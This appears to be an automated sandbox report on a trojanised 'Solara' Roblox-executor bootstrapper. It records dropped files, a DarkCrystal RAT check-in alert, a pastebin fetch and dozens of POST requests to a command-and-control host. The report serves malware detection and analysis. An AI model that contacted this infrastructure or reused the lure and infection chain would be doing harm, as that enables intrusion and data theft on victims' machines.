                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeJoe Sandbox ML: detected
                                    Source: BootstrapperV1.19.exeJoe Sandbox ML: detected
                                    Source: BootstrapperV1.19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                    Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49733 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.4:49734 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49735 version: TLS 1.2
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: BootstrapperV1.19.exe
                                    Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Xml.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdb` source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Configuration.pdb[ source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: \??\C:\Windows\System.pdbX source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE455000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Configuration.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: em.pdb3s[ source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Configuration.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.ni.pdbRSDSC source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.PDB4y source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.Xml.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.pdb source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp, WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Data.pdbH source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Runtime.Serialization.pdbMZ source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.ni.pdb source: WER5022.tmp.dmp.7.dr
                                    Source: Binary string: System.Core.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_00D2A69B
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_00D3C220
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62761 -> 80.211.144.156:80
                                    Source: unknownDNS query: name: pastebin.com
                                    Source: Yara matchFile source: 1.0.BootstrapperV1.19.exe.158ac680000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, type: DROPPED
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: getsolara.dev
                                    Source: global trafficHTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1732Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1000Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 249380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1736Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1724Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
